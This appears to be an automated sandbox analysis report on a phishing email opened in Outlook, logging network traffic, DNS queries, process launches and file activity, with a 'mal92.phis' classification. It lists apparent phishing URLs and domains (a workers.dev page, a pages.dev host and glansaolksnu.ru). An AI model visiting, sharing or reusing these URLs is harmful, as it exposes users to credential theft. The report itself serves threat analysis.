                  Source: global trafficHTTP traffic detected: GET ///4539.php HTTP/1.1Host: glansaolksnu.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=USmGenYh+nnGnwz&MD=Om4EY1cl HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                  Source: global trafficDNS traffic detected: DNS query: www.estampariaimagemeacao.com.br
                  Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
                  Source: global trafficDNS traffic detected: DNS query: www.google.com
                  Source: global trafficDNS traffic detected: DNS query: ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev
                  Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
                  Source: global trafficDNS traffic detected: DNS query: glansaolksnu.ru
                  Source: global trafficDNS traffic detected: DNS query: code.jquery.com
                  Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
                  Source: unknownHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 3592Host: login.live.com
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 27 Aug 2024 18:03:33 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
                  Source: 57C8EDB95DF3F0AD4EE2DC2B8CFD4157.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
                  Source: (No subject) (59).emlString found in binary or memory: http://www.w3.=
                  Source: chromecache_83.14.drString found in binary or memory: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/#BbXRoYW9Ac2FudGFjbGFyYWNhLmd
                  Source: (No subject) (59).eml, ~WRS{79BB17B2-F0CF-4E59-B86E-C8C993DBA843}.tmp.0.drString found in binary or memory: https://aka.ms/LearnAboutSenderIdentification
                  Source: chromecache_87.14.drString found in binary or memory: https://cdn.jsdelivr.net/npm/
                  Source: chromecache_87.14.drString found in binary or memory: https://cdn.jsdelivr.net/npm/bootstrap
                  Source: chromecache_86.14.dr, chromecache_95.14.dr, chromecache_90.14.dr, chromecache_92.14.dr, chromecache_89.14.dr, chromecache_88.14.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js
                  Source: chromecache_95.14.dr, chromecache_90.14.dr, chromecache_92.14.dr, chromecache_89.14.drString found in binary or memory: https://challenges.cloudflare.com/turnstile/v0/api.js
                  Source: chromecache_87.14.drString found in binary or memory: https://code.jquery.com/jquery-3.5.1.slim.min.js
                  Source: chromecache_87.14.drString found in binary or memory: https://glansaolksnu.ru/#
                  Source: chromecache_87.14.drString found in binary or memory: https://glansaolksnu.ru/#about
                  Source: chromecache_87.14.drString found in binary or memory: https://glansaolksnu.ru/#classic-cars
                  Source: chromecache_87.14.drString found in binary or memory: https://glansaolksnu.ru/#contact
                  Source: chromecache_87.14.drString found in binary or memory: https://glansaolksnu.ru/#electric-vehicles
                  Source: chromecache_87.14.drString found in binary or memory: https://glansaolksnu.ru/#faq
                  Source: chromecache_87.14.drString found in binary or memory: https://glansaolksnu.ru/#learn-more
                  Source: chromecache_87.14.drString found in binary or memory: https://glansaolksnu.ru/#modern-supercars
                  Source: chromecache_87.14.drString found in binary or memory: https://glansaolksnu.ru/#privacy
                  Source: chromecache_87.14.drString found in binary or memory: https://glansaolksnu.ru/#services
                  Source: chromecache_87.14.drString found in binary or memory: https://glansaolksnu.ru/#terms
                  Source: OUTLOOK_16_0_16827_20130-20240827T1403080997-6300.etl.0.drString found in binary or memory: https://login.windows.localR
                  Source: OUTLOOK_16_0_16827_20130-20240827T1403080997-6300.etl.0.drString found in binary or memory: https://login.windows.localnull
                  Source: chromecache_87.14.drString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js
                  Source: (No subject) (59).emlString found in binary or memory: https://worker-rough-fire-759a.berwieberwieberwieb
                  Source: (No subject) (59).emlString found in binary or memory: https://worker-rough-fire-759a.berwieberwieberwieberwieberwie.workers.dev/?eba=.htm
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                  Source: unknownHTTPS traffic detected: 40.126.31.73:443 -> 192.168.2.16:49702 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 40.126.31.73:443 -> 192.168.2.16:49705 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49706 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49708 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.16:49710 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 4.231.128.59:443 -> 192.168.2.16:49711 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 40.126.31.73:443 -> 192.168.2.16:49712 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 20.73.194.208:443 -> 192.168.2.16:49714 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 20.73.194.208:443 -> 192.168.2.16:49716 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 20.73.194.208:443 -> 192.168.2.16:49717 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 20.73.194.208:443 -> 192.168.2.16:49718 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.16:49754 version: TLS 1.2
                  Source: classification engineClassification label: mal92.phis.winEML@19/53@32/13
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmpJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20240827T1403080997-6300.etlJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile read: C:\Users\desktop.iniJump to behavior
                  Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\(No subject) (59).eml"
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "A7A183EE-2C77-4E4F-B725-8BFB05112EFD" "BB25D3F2-0E53-48AB-AEB6-C8D394DB4A1D" "6300" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\9AYNO56K\https___worker-rough-fire-759a.berwieberwieberwieberwieberwie.workers.dev__eba.htm
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1892,i,9245279310227330186,10471409212355805271,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "A7A183EE-2C77-4E4F-B725-8BFB05112EFD" "BB25D3F2-0E53-48AB-AEB6-C8D394DB4A1D" "6300" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"Jump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\9AYNO56K\https___worker-rough-fire-759a.berwieberwieberwieberwieberwie.workers.dev__eba.htmJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1892,i,9245279310227330186,10471409212355805271,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: c2r64.dllJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{F959DBBB-3867-41F2-8E5F-3B8BEFAA81B3}\InprocServer32Jump to behavior
                  Source: Google Drive.lnk.13.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                  Source: YouTube.lnk.13.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                  Source: Sheets.lnk.13.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                  Source: Gmail.lnk.13.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                  Source: Slides.lnk.13.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                  Source: Docs.lnk.13.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEWindow found: window name: SysTabControl32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\outlook\ConfigContextData 1Jump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
